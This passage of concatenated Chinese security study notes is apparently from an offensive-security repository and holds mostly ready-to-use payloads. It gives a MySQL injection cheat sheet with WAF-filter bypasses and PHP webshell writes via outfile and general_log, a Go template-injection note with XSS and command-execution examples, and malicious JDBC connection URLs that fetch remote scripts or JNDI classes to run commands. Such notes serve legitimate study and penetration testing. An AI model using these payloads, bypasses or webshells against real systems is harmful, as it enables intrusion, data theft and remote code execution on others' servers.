 63 | `limit N `返回N条记录;`limit N,M`相当于`limit M offset N`，即从第 N 条记录开始, 返回 M 条记录。
 64 | 
 65 | ### 报错注入
 66 | ```
 67 | 1.floor()  向下取整:只返回值X的整数部分，小数部分舍弃
 68 | select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
 69 | 
 70 | floor()报错注入的原因是group by在向临时表插入数据时，由于rand()多次计算导致插入临时表时主键重复。
 71 | * 类似方法
 72 | ROUND()  四舍五入取整
 73 | CEILING() 向上取整
 74 | 
 75 | 2.extractvalue()  MySQL 5.1.5版本中添加，对XML文档进行查询。使用XPath表示法从XML字符串中提取值
 76 | select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
 77 | 
 78 | 3.updatexml()  MySQL 5.1.5版本中添加，返回替换的XML片段
 79 | select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
 80 | 
 81 | 4.geometrycollection() 几何对象，高版本中不适用
 82 | select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
 83 | 
 84 | 5.multipoint() 几何对象，高版本中不适用
 85 | select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
 86 | 
 87 | 6.polygon() 几何对象，高版本中不适用
 88 | select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
 89 | 
 90 | 7.multipolygon() 几何对象，高版本中不适用
 91 | select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
 92 | 
 93 | 8.linestring() 几何对象，高版本中不适用
 94 | select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
 95 | 
 96 | 9.multilinestring() 几何对象，高版本中不适用
 97 | select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
 98 | 
 99 | 10.exp() 溢出报错
100 | select * from test where id=1 and exp(~(select * from(select user())a));
101 | ```
102 | 
103 | 以updatexml为例
104 | ```
105 | 爆库：
106 | updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +
107 | 
108 | 爆表：
109 | updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
110 | 
111 | 爆字段：
112 | updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
113 | 
114 | 爆数据：
115 | updatexml(1,(select concat(0x7e, password,0x7e) from users limit 1,1),1) -- +
116 | ```
117 | 
118 | ### 盲注
119 | ```
120 | # 时间盲注
121 | and if((substr((select user()),1,1)='r'),sleep(5),1);   // 为真就延迟
122 | and if((substr((select user()),1,1)='r'),BENCHMARK(20000000,md5('a')),1);
123 | and case when (substr((select user()),1,1)="r") then sleep(3) else 1 end;
124 | or if((substr((select user()),1,1)='r'),((select sleep(5) from information_schema.schemata as b)),1);-- +
125 | 
126 | # 布尔盲注
127 | and substr((select user()),1,1)='r' -- +
128 | and IFNULL((substr((select user()),1,1)='r'),0) -- +
129 | and strcmp((substr((select user()),1,1)='r'),1) -- +
130 | and 0=strcmp((substr((select user()),1,1)),'o');
131 | 
132 | ```
133 | 
134 | ### insert / delete / update 注入
135 | ```
136 | # insert注入报错 （insert注入因为会写入到数据库中，所以会产生垃圾数据）
137 | insert into admin (id,username,password) values (2,""or updatexml(1,concat(0x7e,(version())),0) or"","admin");
138 | 
139 | # insert盲注
140 | insert into admin values (2+if((substr((select user()),1,1)='p'),sleep(5),1),'1',"admin");
141 | insert into admin values (2,''+if((substr((select user()),1,1)='r'),sleep(5),1)+'',"admin");
142 | 
143 | # delete报错注入 （delete注入or右侧条件一定要为false,减少对数据库的影响）
144 | delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0);
145 | 
146 | # delete盲注
147 | delete from admin where id =-2 or if((substr((select user()),1,1)='r4'),sleep(5),1);
148 | delete from admin where id =-2 or if((substr((select user()),1,1)='r'),sleep(5),0);
149 | 
150 | # update注入
151 | update admin set id="5"+sleep(5)+"" where id=2;
152 | ```
153 | 
154 | ### order by注入
155 | ```
156 | # 布尔
157 | select * from admin order by if(1=1,username,password);
158 | select * from admin order by if((substr((select user()),1,1)='r1'),username,password);
159 | 
160 | # 盲注
161 | select * from admin order by if((substr((select user()),1,1)='r'),sleep(5),password);
162 | select * from admin order by if((substr((select user()),1,1)='r'),(select 1 from (select sleep(2)) as b),password);
163 | 
164 | # 报错
165 | select * from admin order by (extractvalue(1,concat(0x3a,version())),1);
166 | ```
167 | 
168 | ### 读写文件
169 | ```
170 | # 查询是否具备读写条件，5.6.34版本以后secure_file_priv的值默认为NULL，即无法读写。需要手动将配置文件该值改为空。
171 | show global variables like '%secure%';
172 | 
173 | # 读文件，文件名支持Hex或Char编码
174 | select * from admin union select 1,hex(load_file('C:\\test.txt')),3;
175 | 
176 | # 读文件
177 | create table test(test text);
178 | insert into test(test) values (load_file('C:\\1.txt'));
179 | select * from test;
180 | 
181 | # 写文件，outfile后跟绝对路径，并且要求路径下文件具备写权限
182 | select * from admin where id =1 union select 1,'<?php eval($_POST[cmd]);?>',3 into outfile 'C:\\test.txt';
183 | 
184 | # 通过更改日志路径，查询写文件
185 | set global general_log=on;
186 | set global general_log_file='C://test.php';
187 | select '<?php eval($_POST['cmd']) ?>';
188 | 
189 | # 堆叠查询写文件 （堆叠查询，通过;号分割多语句进行查询）
190 | id=1%27;set global general_log=on;set global general_log_file='C://phpstudy//404.php';--+
191 | id=1%27;select '<?php eval($_POST[404]) ?>';--+
192 | ```
193 | `outfile`会在行末写入新行，而且会转义换行符。`dumpfile`导出完整文件，不会转义。
194 | 
195 | ### 宽字节注入
196 | `ASCII`码有127个字符，后来发现不够用，又扩展到了256个(扩展字符集，UTF-8)     
197 | 但是为了表示中文，设计了`GB2312`: 小于127的字符意义和ASCII相同。两个大于127的字符连在一起就表示一个汉字    
198 | 再后来，汉字实在太多，就更改只要第一个字节大于127就表示一个汉字，即`GBK`编码    
199 | 
200 | 宽字节注入的核心，是GB2312、GBK、BIG5等需要两个字节编码，可能将两个ASCII字符误认为是一个宽字节字符    
201 | 例如将`xi'an`理解为`xian`，将`li'ang`理解为`liang`
202 | GBK编码对照表: http://tools.jb51.net/table/gbk_table
203 | 
204 | 在一些开发场景下，会将`'`这种敏感字符转译，在前面加个`\`。`\'`经过url编码，会变成`%5c%27`
205 | 
206 | 大于127的字符，即从128开始，对应十六进制的0x81   
207 | GBK首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），所以%df和%5C会结合认作一个字符；这样单引号就被闭合了（单引号逃逸）   
208 | GB2312首字节范围是0xA1-0xF7，低位范围是0xA1-0xFE(0x5C不在该范围内)，因此不能使用编码吃掉%5c
209 | ```
210 | %5c -> \
211 | %27 -> '
212 | %20 -> (空格)
213 | %23 -> #
214 | %3d -> =
215 | ```
216 | 可以从GBK编码表中挑选一个满足的字符例如%df，宽字节注入过程如下
217 | ```
218 | %df%27 -> %df%5c%27 -> 運'
219 | ```
220 | 
221 | ### 绕过
222 | ```
223 | # 注释方法
224 | /*xxxx*/  
225 | /*/*xxxx*/
226 | --空格
227 | #
228 | ;%00
229 | 
230 | # and or 过滤
231 | and -> &
232 | or -> | 
233 | 
234 | # 数字过滤 1=1过滤
235 | and ~1>1
236 | and hex(1)>-1
237 | and hex(1)>~1
238 | and -2<-1
239 | and ~1=1
240 | and!!!1=1
241 | and 1-1
242 | and true
243 | and 1
244 | 
245 | # union select过滤
246 | union/*select*/
247 | union/*!/*!11440select*/
248 | union/*!11441/*!11440select*/
249 | union/*!11440select*/
250 | union/*!11440/**/%0aselect*/
251 | union a%23 select
252 | union all%23 select
253 | union all%23%0a select
254 | union %23%0aall select
255 | union  -- 1%0a select
256 | union  -- hex()%0a select
257 | union(select 1,2,3)
258 | 
259 | 数字代表版本号，需要遍历测试
260 | 
261 | # information_schema.schemata被过滤
262 | `information_schema`.`schemata `  
263 | information_schema/**/.schemata
264 | information_schema/*!*/.schemata
265 | information_schema%0a.schemata
266 | 
267 | # users被过滤，加数据库名绕过
268 | security.users
269 | security.`users`
270 | 
271 | # 盲注绕过
272 | and!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
273 | and!!!substr((select unhex(hex(user/**/(/*!*/)))),1,1)=1
274 | /*!%26%26*/ substr((select hex(user/**/(/*!*/))),1,1)>1
275 | and!!!substr((select user-- (1)%0a()),1,1)='r'
276 | and!!!substr((select{x @@datadir}),1,1)='D'
277 | and strcmp((substr((select /*from*/),2,1)),'0')
278 | and strcmp((substr((select password/* -- + %0afrom/**/users limit 0,1),1,1)),'D')
279 |  and if((strcmp((substr((select password/* -- + %0afrom/**/users limit 0,1),1,1)),'D')),1,sleep(5))
280 | 
281 | # 报错注入绕过，过滤updatexml()
282 | /*updatexml*/(1,1,1)
283 | /*!11440updatexml*/(1,1,1)
284 | /*!%26%26*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
285 | /*!||*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
286 | /*!xor*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
287 |  | /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
288 |  xor /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
289 |  `updatexml`(1,(select hex(user/**/(/**/))),1)
290 |  `updatexml`(1,select `user`%0a(),1) 
291 |  
292 |  # from表名 被过滤
293 | select from[user]
294 | ```
295 | 
296 | 附录
297 | 1. sqli-labs环境搭建
298 | ```
299 | docker search sqli-labs  //搜索sqli-labs
300 | docker pull acgpiano/sqli-labs  //拉取镜像
301 | docker images  //查看镜像
302 | docker run -dt --name sqli-labs -p 8081:80 --rm acgpiano/sqli-labs  //后台运行镜像，docker端口映射到主机端口，执行后会返回一个ID号
303 | docker exec -it ID号 /bin/bash  //进入docker容器
304 | //参数解释：-dt  后台运行； --name  命名；-p 80:80  将后面的docker容器端口映射到前面的主机端口。
305 | docker start sqli-labs  //启动
306 | ```
307 | 
308 | 2. 常用mysql函数
309 | ```
310 | CONCAT(): 字符串连接 CONCAT(string1,string2, ... );
311 | CONCAT_WS(): 根据预定义的分隔符相连接字符串 CONCAT_WS(seperator,string1,string2, ... );
312 | if(expre1，expre2，expre3): expre1为true时，返回expre2；否则返回expre3 
313 | substr(string string,num start,num length): 截取字符串
314 | substring(str, pos) 或 substring(str, pos, length) 后者类似substr
315 | left(str, length): 从左截取字符串
316 | right(str, length): 从右截取字符串
317 | BENCHMARK(count,expr): 重复执行expr表达式count次，这个函数的返回值始终是0，但会消耗时间以测试执行效率
318 | ascii(chr): 返回字符的ASCII值
319 | hex(chr): 返回字符的hex值
320 | STRCMP(str1, str2): 比较字符串，相等为0，str1大为1，str2大为-1
321 | IFNULL(expression, alt_value): 判断表达式是否为NULL，是则返回第二个参数的值，否则返回表达式的值。
322 | ```
323 | 
324 | 3. 基本语句
325 | ```
326 | # 创建数据库
327 | create database test;
328 | 
329 | # 创建数据表
330 | create table users (id int, username varchar(255), password varchar(255));
331 | ```
332 | 
333 | 
334 | 
335 | 


--------------------------------------------------------------------------------
/Go Security/Go Server Side Template Injection(SSTI).md:
--------------------------------------------------------------------------------
  1 | # Go Server Side Template Injection(SSTI)
  2 | 
  3 | Golang的标准库中，支持使用使用模板来定义输出文件的格式和内容，它们分别是[text/template]()和 [html/template]()。它们都支持将变量或方法与模板绑定在一起，从而实现View于Data的分离。
  4 | 
  5 | ## Template 介绍
  6 | 
  7 | 两者有一点不同的是，前者不带过滤器，对于在模板中展示的内容，不会进行编码或转义。但后者由于在web场景中使用，增加了[安全机制](https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#problem_definition)，会对内容进行转义。下面看示例：
  8 | 
  9 | ```go
 10 | package main
 11 | 
 12 | import (
 13 | 	"fmt"
 14 | 	"html/template"
 15 | 	"net/http"
 16 | )
 17 | 
 18 | func main() {
 19 | 	payload := "<script>alert(1)</script>"
 20 | 	var tmpl = `{{ . }}`
 21 | 
 22 | 	t := template.Must(template.New("").Parse(tmpl))
 23 | 
 24 | 	t.Execute(os.Stdout, &payload)
 25 | }
 26 | ```
 27 | 输出内容如下
 28 | ```html
 29 | &lt;script&gt;alert(1)&lt;/script&gt;
 30 | ```
 31 | 将`html/template`替换为`text/tempalte`后，输出如下
 32 | ```
 33 | <script>alert(1)</script>
 34 | ```
 35 | 根据文档的说明，对于模版
 36 | ```html
 37 | <a href="/search?q={{.}}">{{.}}</a>
 38 | ```
 39 | 实际解析过程中会被替换为如下内容
 40 | ```html
 41 | <a href="/search?q={{. | urlescaper | attrescaper}}">{{. | htmlescaper}}</a>
 42 | ```
 43 | 所以，实际上解析器会根据上下文的不同，调用对应方法将内容进行转义。而Golang中的模板注入，根据注入的方式不同，会造成不同的影响。一种情况是，模板内容可控，另一种是注入目标的数据对象可控。
 44 | ```go
 45 | var tmpl = fmt.Sprintf(`{{ . }} %s`, injected_tempalte) 
 46 | // or
 47 | var tmpl = `{{ .Payload }}`
 48 | t := template.Must(template.New("").Parse(tmpl))
 49 | t.Execute(os.Stdout, injected_data_object)
 50 | ```
 51 | 
 52 | ### 函数调用
 53 | 
 54 | Go中的模板语法还支持其它功能，变量声明，条件判断，循环，函数调用等。模板的全局上下文有如下函数：
 55 | | function             | description                                                                                                                                                |
 56 | | -------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
 57 | | `and`                  | 返回参数逻辑与的结果，直到遇到第一个空的参数，或最后一个参数的结果。如`and x y`，执行逻辑为`if x then y else x`                                            |
 58 | | `call`                 | 返回被调用方法的结果，被调用方法需要返回一个或两个返回值，且第二个返回值为`error`，若`error`不为空则停止后续执行。如`call .X.Y 1 2`，执行逻辑为`.X.Y(1,2)` |
 59 | | `html`                 | 返回HTML转义后的内容，`html/tempalte`包中不可用                                                                                                            |
 60 | | `index`                | 返回给定参数索引后的值，`index x 1`，等价于`x[1]`                                                                                                          |
 61 | | `slice`                | 返回给定参数的切片                                                                                                                                         |
 62 | | `print/printf/println` | `fmt.print/fmt.printf/fmt.println`                                                                                                                         |
 63 | 
 64 | >更详细的内容见，https://pkg.go.dev/text/template#hdr-Functions
 65 | 
 66 | ## 安全隐患
 67 | 
 68 | ### XSS
 69 | 
 70 | `html/template`的主要目的之一就是为了防止`XSS`漏洞的产生，所以它具备较完善的安全机制，会对渲染的内容进行转义。如果能让注入的内容不被转义，那么就可能导致`XSS`。一种方法是，使用如下模板语法，进行注入
 71 | ```go
 72 | {{ define "T" }}<script>alert(1)</script>{{ end }}{{template "T"}}
 73 | ```
 74 | > 这段语句的意思是，定义一个模板，并通过`{{template "T"}}`使用它。
 75 | 
 76 | 下面是一段示例代码
 77 | ```go
 78 | package main
 79 | 
 80 | import (
 81 | 	"fmt"
 82 | 	"html/template"
 83 | 	"net/http"
 84 | )
 85 | 
 86 | func main() {
 87 | 	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
 88 | 		q := r.URL.Query()["q"][0]
 89 | 		tmp := fmt.Sprintf(`
 90 | <h1> Hi {{ . }} %s </h1>`, q)
 91 | 		tmpl := template.Must(template.New("page").Parse(tmp))
 92 | 		tmpl.Execute(w, "")
 93 | 	})
 94 | 	http.ListenAndServe(":80", nil)
 95 | }
 96 | ```
 97 | 发送如下请求
 98 | ```http
 99 | localhost?q={{%20define%20"T"%20}}<script>alert(1)</script>{{%20end%20}}{{template%20"T"}}
100 | ```
101 | 成功弹窗，当然这里需要假设**模板可控**。
102 | ![](../images/Pasted%20image%2020230307105828.png)
103 | 
104 | ### 代码执行
105 | >这部分内容是最为鸡肋的，现实中应该很难碰到。
106 | 
107 | 除了内嵌的函数，模板中还能调用传入对象所具有的方法。具体见下面的例子
108 | ```go
109 | package main
110 | 
111 | import (
112 | 	"bytes"
113 | 	"fmt"
114 | 	"html/template"
115 | 	"net/http"
116 | )
117 | 
118 | type Todo struct {
119 | 	Title string
120 | 	Done  bool
121 | }
122 | 
123 | type TodoPageData struct {
124 | 	PageTitle string
125 | 	Todos     []Todo
126 | }
127 | 
128 | func (t *Todo) TodoFunc(content string) string {
129 | 	b := bytes.Buffer{}
130 | 	fmt.Fprintln(&b, t.Done, content)
131 | 	return b.String()
132 | }
133 | 
134 | func main() {
135 | 	tmpl := template.Must(template.ParseFiles("layout.html"))
136 | 	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
137 | 		data := TodoPageData{
138 | 			PageTitle: "My TODO list",
139 | 			Todos: []Todo{
140 | 				{Title: "Task 1", Done: false},
141 | 				{Title: "Task 2", Done: true},
142 | 				{Title: "Task 3", Done: true},
143 | 			},
144 | 		}
145 | 		tmpl.Execute(w, data)
146 | 	})
147 | 	http.ListenAndServe(":80", nil)
148 | }
149 | ```
150 | `layout.html`
151 | ```html
152 | <h1>{{.PageTitle}}</h1>
153 | <ul>
154 |     {{range .Todos}}
155 |         {{if .Done}}
156 |             <li class="done">{{.TodoFunc .Title}}</li>
157 |         {{else}}
158 |             <li>{{.Title}}</li>
159 |         {{end}}
160 |     {{end}}
161 | </ul>
162 | ```
163 | 结果如下。
164 | ![](../images/Pasted%20image%2020230310210247.png)
165 | 如果此方法是一个危险的方法，例如可执行命令或者读取文件，那就会导致危险行为的产生。对代码进行修改：
166 | ```go
167 | func main() {
168 | 	tmpl := template.Must(template.ParseFiles("layout.html"))
169 | 	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
170 | 		todo := r.URL.Query()["q"][0]
171 | 		data := TodoPageData{
172 | 			PageTitle: "My TODO list",
173 | 			Todos: []Todo{
174 | 				{Title: todo, Done: true},
175 | 			},
176 | 		}
177 | // ...
178 | func (t *Todo) TodoFunc(content string) string {
179 | 	out, _ := exec.Command(content).CombinedOutput()
180 | 	return string(out)
181 | }
182 | ```
183 | ![](../images/Pasted%20image%2020230310211445.png)
184 | 如果模板可控，那么可以使用`{{ .TodoFunc "cmd" }}`来调用所需方法。
185 | 
186 | ## 参考
187 | 1. https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html
188 | 2. https://www.onsecurity.io/blog/go-ssti-method-research/
189 | 


--------------------------------------------------------------------------------
/JavaVulType/JDBC.md:
--------------------------------------------------------------------------------
  1 | # JDBC 攻击
  2 | 
  3 | - [JDBC 应用](#jdbc应用)
  4 | 
  5 | - [JDBC 攻击-mysql](#jdbc攻击-mysql)
  6 | 
  7 |   - [ServerStatusDiffInterceptor 调用链](#serverstatusdiffinterceptor调用链)
  8 |   - [detectCustomCollations 调用链](#detectcustomcollations调用链)
  9 |   - [payload](#payload)
 10 | 
 11 | - [JDBC 攻击-其他数据库](#jdbc攻击-其他数据库)
 12 | 
 13 |   - [H2](#h2)
 14 |   - [DB2](#db2)
 15 |   - [ModeShape](#modeshape)
 16 |   - [Apache Derby](#apache-derby)
 17 |   - [SQLite](#sqlite)
 18 |   - [PostgreSQL](#postgresql)
 19 |   - [Apache Calcite Avatica](#apache-calcite-avatica)
 20 |   - [Snowflake](#snowflake)
 21 | 
 22 | - [JDBC 攻击-文件读取](#jdbc攻击-文件读取)
 23 | 
 24 | JDBC（Java DataBase Connectivity），是 Java 程序访问数据库的标准接口。常用的关系数据库包括：付费的（`Oracle、SQL Server、DB2、Sybase`）、开源的（`MySQL、PostgreSQL、Sqlite`）。JDBC 接口通过 JDBC 驱动来访问数据库，而 JDBC 驱动由各个数据库厂商提供，也就是不同的数据库对应有各自的驱动。使用 JDBC 的好处就是不需要根据不同的数据库做开发，拥有统一的接口。
 25 | 
 26 | ## JDBC 应用
 27 | 
 28 | 假如使用 MySQL 的 JDBC 驱动，只需要在 maven 中引入对应的 jar 包。scope 设置为 runtime，因为编译时并不需要此 jar 包，只在运行期使用。
 29 | 
 30 | ```
 31 | <dependency>
 32 |     <groupId>mysql</groupId>
 33 |     <artifactId>mysql-connector-java</artifactId>
 34 |     <version>5.1.47</version>
 35 |     <scope>runtime</scope>
 36 | </dependency>
 37 | ```
 38 | 
 39 | 使用 jdbc 连接 mysql 中 student 数据库（mysql 驱动后面跟的可选扩展参数包括`loadDataLocal、requireSSL、socksProxyHost、useAsyncProtocol、useServerPrepStmts、allowUrlInLoadLocal`等）
 40 | 
 41 | ```java
 42 | String JDBC_URL = "jdbc:mysql://localhost:3306/student?requireSSL=false";
 43 | String JDBC_USER = "root";
 44 | String JDBC_PASSWORD = "password";
 45 | try (Connection conn = DriverManager.getConnection(JDBC_URL, JDBC_USER, JDBC_PASSWORD)) { // 获取数据库连接
 46 |     try (Statement stmt = conn.createStatement()) {
 47 |         try (ResultSet rs = stmt.executeQuery("SELECT id, name FROM students WHERE id=1")) {
 48 |             while (rs.next()) { // 获取列数据
 49 |                 int id = rs.getInt(1); // ResultSet 索引从1开始，而不是0
 50 |                 String name = rs.getString(2);
 51 |             }
 52 |         }
 53 |     }
 54 | }
 55 | conn.close();
 56 | ```
 57 | 
 58 | `Statement`容易引发 SQL 注入，想要完全避免 SQL 注入可以使用`PreparedStatement`，使用占位符的方式。
 59 | 
 60 | ```java
 61 | try (Connection conn = DriverManager.getConnection(JDBC_URL, JDBC_USER, JDBC_PASSWORD)) {
 62 |     try (PreparedStatement ps = conn.prepareStatement("SELECT id, name FROM students WHERE id=?")) {
 63 |         ps.setObject(1, id);
 64 |         try (ResultSet rs = ps.executeQuery()) {
 65 |             while (rs.next()) {
 66 |                 int id = rs.getInt("id");
 67 |                 String name = rs.getString("name");
 68 |             }
 69 |         }
 70 |     }
 71 | }
 72 | ```
 73 | 
 74 | ## jdbc 攻击-mysql
 75 | 
 76 | 上面提到 mysql 驱动的 URL 可选扩展参数有很多，其中一个叫做`autoDeserialize`，如果配置为 true，客户端会自动反序列化服务端返回的数据。mysql-connector-java.jar 中的类`com/mysql/cj/jdbc/result/ResultSetImpl.class#getObject()`方法如下。如果 autoDeserialize 属性值为 true，就会进行反序列化操作。
 77 | 
 78 | ```java
 79 | byte[] data = this.getBytes(columnIndex);
 80 | if (!(Boolean)this.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue()) {
 81 |     return data;
 82 | } else {
 83 |     Object obj = data;
 84 |     if (data != null && data.length >= 2) {
 85 |         ...
 86 |         try {
 87 |             ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
 88 |             ObjectInputStream objIn = new ObjectInputStream(bytesIn);
 89 |             obj = objIn.readObject();
 90 |             objIn.close();
 91 |             bytesIn.close();
 92 |         }
 93 | }
 94 | ```
 95 | 
 96 | 但是默认情况下客户端不会调用 getObject()方法。就像找反序列化调用链一样需要找到上层的调用。
 97 | 
 98 | ### ServerStatusDiffInterceptor 调用链
 99 | 
100 | <https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf这篇给出的链条如下>
101 | 
102 | ```
103 | com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#postProcess/preProcess()
104 |   com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor#populateMapWithSessionStatusValues()
105 |     ResultSetUtil#resultSetToMap()
106 | ```
107 | 
108 | 最终走到的 resultSetToMap 方法如下，调用了 getObject()方法
109 | 
110 | ```java
111 | public static void resultSetToMap(Map mappedValues, ResultSet rs) throws SQLException {
112 |     while (rs.next()) {
113 |         mappedValues.put(rs.getObject(1), rs.getObject(2));
114 |     }
115 | }
116 | ```
117 | 
118 | `ServerStatusDiffInterceptor`实现自 QueryInterceptor 接口，它对应扩展参数 queryInterceptors。那么就可以构造一个恶意的 JDBC URI 来触发反序列化。
119 | 
120 | ```
121 | jdbc:mysql://attacker/db?queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true
122 | ```
123 | 
124 | ### detectCustomCollations 调用链
125 | 
126 | 这条链最终也是走到 resultSetToMap 方法，核心是`com.mysql.jdbc.ConnectionImpl#buildCollationMapping()`方法，如果满足版本大于 4.1.0 并且 detectCustomCollations 值为 true，就会调用到 resultSetToMap 方法，最终进行反序列化操作。
127 | 
128 | ```java
129 | if (this.versionMeetsMinimum(4, 1, 0) && this.getDetectCustomCollations()) { // 版本大于4.1.0，detectCustomCollations值为true
130 |     java.sql.Statement stmt = null;
131 |     ResultSet results = null;
132 | 
133 |     try {
134 |         sortedCollationMap = new TreeMap();
135 |         customCharset = new HashMap();
136 |         customMblen = new HashMap();
137 |         stmt = this.getMetadataSafeStatement();
138 | 
139 |         try {
140 |             results = stmt.executeQuery("SHOW COLLATION");
141 |             if (this.versionMeetsMinimum(5, 0, 0)) {
142 |                 Util.resultSetToMap(sortedCollationMap, results, 3, 2); // 调用resultSetToMap()
143 |         }...
144 | }
145 | ```
146 | 
147 | 因为是服务端攻击客户端，还需要一个恶意的 mysql 服务端。这部分可以用工具: <https://github.com/fnmsd/MySQL_Fake_Server>
148 | 
149 | 恶意 mysql 服务器的核心思路是将反序列化数据存储在对应的数据表中对应字段中。以 detectCustomCollations 调用链为例`Util.resultSetToMap(sortedCollationMap, results, 3, 2);`会对第三个字段进行获取，那么就需要创建一张表，列出至少三个字段，并将 `ysoserial` 生成的反序列化数据赋值给第三个字段。
150 | 
151 | ### Payload 总结
152 | 
153 | #### `ServerStatusDiffInterceptor` 触发
154 | 
155 | ##### 8.x
156 | 
157 | ```java
158 | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
159 | ```
160 | 
161 | ##### 6.x
162 | 
163 | 属性名不同，变更为 `statementInterceptors`
164 | 
165 | ```java
166 | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
167 | ```
168 | 
169 | ##### 5.1.11 - 5.x
170 | 
171 | ```java
172 | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
173 | ```
174 | 
175 | > `5.1.10` 及以下的 `5.1.X` 版本：同上，但是需要连接后执行查询。
176 | 
177 | 另外由于不同版本 jdbc 扩展参数可能存在差异，工具中也给出了不同版本下的利用 URI
178 | 
179 | Ps: 如果是读文件需要加 maxAllowedPacket=655360
180 | 
181 | ##### 5.0.x
182 | 
183 | 没有 `ServerStatusDiffInterceptor`，不可利用。
184 | 
185 | #### `detectCustomCollations` 触发
186 | 
187 | ##### 5.1.41 - 5.1.x
188 | 
189 | 不可用
190 | 
191 | ##### 5.1.29 - 5.1.40
192 | 
193 | ```java
194 | jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true
195 | ```
196 | 
197 | ##### 5.1.19 - 5.1.28
198 | 
199 | ```
200 | jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true
201 | ```
202 | 
203 | ##### 5.1.x - 5.1.18
204 | 
205 | 不可用
206 | 
207 | ##### 5.0.x
208 | 
209 | 不可用
210 | 
211 | ## JDBC 攻击-其他数据库
212 | 
213 | ### H2
214 | 
215 | ```
216 | # 远程拉取sql脚本
217 | jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8089/poc.sql'
218 | 
219 | poc.sql: CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "run";}';CALL EXEC ('open -a Calculator.app')
220 | 
221 | # 多语句
222 | jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd)\\;return \"trganda\"\\;}'\\;CALL EXEC ('open -a Calculator.app')
223 | 
224 | # Groovy
225 | jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'"
226 | 
227 | String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"open -a Calculator\")" + "})" + "def x";
228 | 
229 | # Javascript
230 | jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER test1 BEFORE SELECT ON INFORMATION_SCHEMA.CATALOGS AS '//javascript\njava.lang.Runtime.getRuntime().exec(\"open -a Calculator.app\")'"
231 | 
232 | # Ruby
233 | jdbc:h2:mem:db;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE SCHEMA IF NOT EXISTS db\\;CREATE TABLE db.TEST(ID INT PRIMARY KEY, NAME VARCHAR(255))\\;CREATE TRIGGER POC BEFORE SELECT ON db.TEST AS '#ruby\nrequire \"java\"\njava.lang.Runtime.getRuntime().exec(\"open -a Calculator.app\")'
234 | ```
235 | 
236 | ### DB2
237 | 
238 | ```
239 | jdbc:db2://127.0.0.1:50001/BLUDB:clientRerouteServerListJNDIName=ldap://127.0.0.1:1389/evilClass;
240 | ```
241 | 
242 | ### ModeShape
243 | 
244 | ```
245 | jdbc:jcr:jndi:ldap://127.0.0.1:1389/evilClass
246 | ```
247 | 
248 | ### Apache Derby
249 | 
250 | ```
251 | jdbc:derby:db;startMaster=true;slaveHost=127.0.0.1
252 | ```
253 | 
254 | 在 `127.0.0.1` 启动恶意 slave 服务。
255 | 
256 | ### SqLite
257 | 
258 | 文件上传 + 利用拓展实现命令执行
259 | 
260 | ```
261 | jdbc:sqlite::resource:http://127.0.0.1:8001/poc.db
262 | ```
263 | 
264 | ### PostgreSQL
265 | 
266 | ```
267 | # Sslfactory & Sslfactoryarg
268 | jdbc:postgresql://localhost/test?sslfactory=org.springframework.context.support.ClassPathXmlApplicationContext&sslfactoryarg=ftp://127.0.0.1:2121/bean.xml
269 | 
270 | # socketFactory & socketFactoryArg
